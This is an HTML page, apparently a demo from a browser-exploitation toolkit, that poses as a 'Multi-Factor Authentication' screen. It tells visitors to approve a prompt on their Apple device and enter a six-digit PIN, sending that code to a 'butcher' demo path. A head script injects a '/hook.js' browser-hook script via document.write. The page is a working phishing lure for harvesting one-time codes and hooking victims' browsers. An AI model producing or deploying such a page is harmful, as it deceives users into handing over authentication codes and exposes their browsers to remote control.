
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Two-Factor Authentication</title>
	
	<script>
		var commandModuleStr = '<script src="/hook.js" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
	
	<style>
		body {
			background-color: #F5F5F5;
			font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
			margin: 0;
			padding: 0;
			height: 100vh;
			display: flex;
			align-items: center;
			justify-content: center;
		}

		.container {
			background-color: #FFFFFF;
			border-radius: 10px;
			padding: 20px;
			box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.2);
			text-align: center;
			max-width: 90%;
			width: 300px;
		}

		h1 {
			color: #000000;
			font-size: 24px;
			font-weight: bold;
			margin-top: 0;
		}

		form {
			margin-top: 20px;
		}

h2 {
			color: #000000;
			font-size: 18px;
			font-weight: bold;
			margin-top: 0;
		}

		form {
			margin-top: 20px;
		}


		input[type="text"] {
			background-color: #F5F5F5;
			border: none;
			border-radius: 5px;
			box-shadow: 0px 1px 3px rgba(0, 0, 0, 0.1);
			color: #000000;
			font-size: 18px;
			padding: 10px;
			width: 100%;
			text-align: center;
			-webkit-appearance: none;
		}

		input[type="submit"] {
			background-color: #007AFF;
			border: none;
			border-radius: 5px;
			color: #FFFFFF;
			font-size: 18px;
			font-weight: bold;
			margin-top: 20px;
			padding: 10px;
			width: 100%;
			-webkit-appearance: none;
		}

		.loader {
			background-color: rgba(0, 0, 0, 0.7);
			height: 100vh;
			left: 0;
			position: fixed;
			top: 0;
			width: 100vw;
			z-index: 9999;
			display: none;
			justify-content: center;
			align-items: center;
		}

		.loading-text {
			color: #FFFFFF;
			font-size: 18px;
			margin-top: 20px;
		}

		.loader:before {
			content: "";
			box-sizing: border-box;
			position: absolute;
			top: calc(50% - 50px);
			left: calc(50% - 50px);
			width: 100px;
			height: 100px;
			border-radius: 50%;
			border: 2px solid #FFFFFF;
			border-top-color: #007AFF;
			animation: loader 0.6s linear infinite;
		}

		@keyframes loader {
			0% { transform: rotate(0deg); }
			100% { transform: rotate(360deg); }
		}
	</style>
</head>
<body>
	<div class="container">
		<h1>Multi-Factor Authentication</h1>
                <h2>Press “ALLOW” on your Apple device to view image</h2>
		<form action="/demos/butcher/loading.html" method="get">
			<label for="pin">Enter the six-digit PIN:</label>
			<input type="text" id		="pin" name="pin" pattern="[0-9]{6}" maxlength="6" required>

		<input type="submit" value="Submit">
	</form>

</body>
</html>
